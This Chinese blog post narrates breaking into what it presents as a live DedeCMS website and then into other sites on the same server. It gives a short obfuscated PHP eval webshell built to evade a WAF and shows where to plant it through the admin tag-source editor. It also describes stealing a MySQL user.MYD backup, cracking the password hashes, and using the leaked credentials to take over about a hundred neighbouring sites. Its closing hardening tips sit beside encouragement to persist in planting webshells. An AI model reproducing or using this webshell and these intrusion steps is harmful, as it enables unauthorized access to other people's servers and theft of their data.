php拿站,一次特别的DedeCMS拿站经历

一系列故事的开端:

这是搜到的一个Dede站点的后台

路径为/dede

获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台，并且下意识的打开了文件管理器

不过管理员也不是等闲之辈，早已卸载该模块

于是，我找到了另一处可以生成PHP文件的地方

在”标签源码管理“这里可以创建PHP脚本文件

去掉默认的代码,写入eval代码,点击保存，文件会存放在 /include/taglib 目录下

注：由于服务器有WAF，PHP脚本进行了简单的混淆

$a='b';

$b=$_POST['x'];

eval($$a);

?>

于是菜刀连接之:

刚开始看到其他站点目录无权限时，并没有想到能够进行旁注

由于管理员权限设置不当，mysql数据库的一个备份副本有权限读取，于是下载了user.MYD

用记事本打开，发现除了root的密码cmd5解不出来，剩下的数据库用户的密码都能在cmd5上获取到原文(这里要鼓励一下站长大大，没有为root用户设置过弱的密码,不然这个服务器就能被提权了)

对于提权呢，在这里说一句，由于该服务器的IIS用户为低权限用户，并且系统补丁修补的也很完全，PHP配置上也进行了降权处理，因此暂时无法威胁到服务器的安全。

然而，旁站所有数据库账号(100多个)的泄露则可以轻易的拿下旁站,在这里就不详细说明了，大致思路基本上就是用webshell连接mysql数据库，寻找类似config、admin、manager、siteconfig这样的表，获取到站点的域名、标题等等的信息以便找到该站点，并且获取后台管理员的账号以及密码，从而登录后台，最后拿到webshell。

同理，在另一个目录中，我也找到了MSSQL2005的数据库备份文件，这里就不进行详细的说明了

案例分析:

这个服务器的管理员的做法并不是完全要被否定的,虽然那个DedeCMS被轻易的拿下了，但是在服务器安全方面也进行了一定程度上的强化。刚拿到webshell的时候，发现对于其他站点没有读写权限，可能很多人到这一步就会放弃尝试旁注，但是如果仔细分析服务器环境，可能能得到意外惊喜。旁注得以实现的原因，在于Windows Server 2008 R2服务器的磁盘分区在被格式化后，磁盘分区的根目录默认有一个Users的读取、写入以及修改的权限，通过文件权限的继承，E盘分区下的所有文件对于Users都具有了读取权限，对于大多数人来说，自然会认为数据盘分区的权限并不会影响到站点的安全，可能并不会去重视此处的权限。然而，数据盘中备份的数据却将所有站点的Mysql数据库密码出卖给了别人。

小结:对于使用DedeCMS的站长们来说,建议修改DedeCMS后台的路径，限制站点的可执行权限以及可写入权限。

拿DedeCMS站点时，发现管理员对站点做一定限制时不要灰心，因为DedeCMS可写入webshell的地方还是很多的，只要耐心，往往都能拿到webshell

在做服务器安全强化时，不要忽视数据盘权限带来的隐患，从小处来说，可能会泄露服务器使用的软件、运行环境，从大危害的方面来说，可能造成数据库密码泄露、FTP密码泄露、旁注等问题，严重的话，还有可能服务器被提权(在这个案例中，如果管理员设置的root密码比较简单，下载user.MYD时获取到的密文就可以解密，从而得到root账号的密码，进而利用root高权限账号提权该服务器)。

更多内容，关注www.mntm520.com